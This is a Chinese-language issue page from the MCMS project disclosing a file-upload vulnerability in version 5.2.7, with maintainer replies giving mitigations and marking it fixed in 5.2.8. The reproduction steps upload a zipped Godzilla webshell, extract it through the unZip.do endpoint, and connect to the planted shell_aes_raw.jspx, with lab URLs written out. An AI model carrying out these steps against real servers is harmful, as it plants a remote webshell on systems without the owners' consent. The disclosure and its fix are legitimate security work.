4.1K Star 16.9K Fork 6.6K

GVP铭飞 / MCMS

 / 详情

MCMSv5.2.7存在文件上传漏洞

已完成
创建于  
2022-05-07 16:56

用tomcat部署mcms
输入图片说明
使用哥斯拉木马进行zip压缩
输入图片说明
/ms-mcms/file/upload.do 接口上传zip文件
输入图片说明
登录账户,访问ms/template/unZip.do接口进行解压缩
http://192.168.137.1:8080/ms-mcms/ms/template/unZip.do?fileUrl=/upload/1651912785393.zip
输入图片说明
访问我们上传的木马文件
http://192.168.137.1:8080/ms-mcms/upload/shell_aes_raw.jspx
输入图片说明

使用哥斯拉进行连接
输入图片说明
连接成功
输入图片说明

评论 (3)

halo 创建了任务

感谢对开源的关注,目前能做的几个步骤
1、yml 配置不允许上传 zip
2、tomcat 不允许执行jspx
3、账号权限控制好(因为这里有个前置条件,用户具备登陆系统并已经拥有管理员权限)

您也可以提议一下您的见解。还有没有更好的方案。

铭飞 任务状态从 待办的 修改为进行中

感谢对开源产品的关注,新的版本已经修复。再次感谢对产品的关注

铭飞 任务状态从 进行中 修改为已完成
铭飞 里程碑设置为5.2.8

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
542665 mingsoft 1578927126
Java
1
https://gitee.com/mingSoft/MCMS.git
git@gitee.com:mingSoft/MCMS.git
mingSoft
MCMS
MCMS

搜索帮助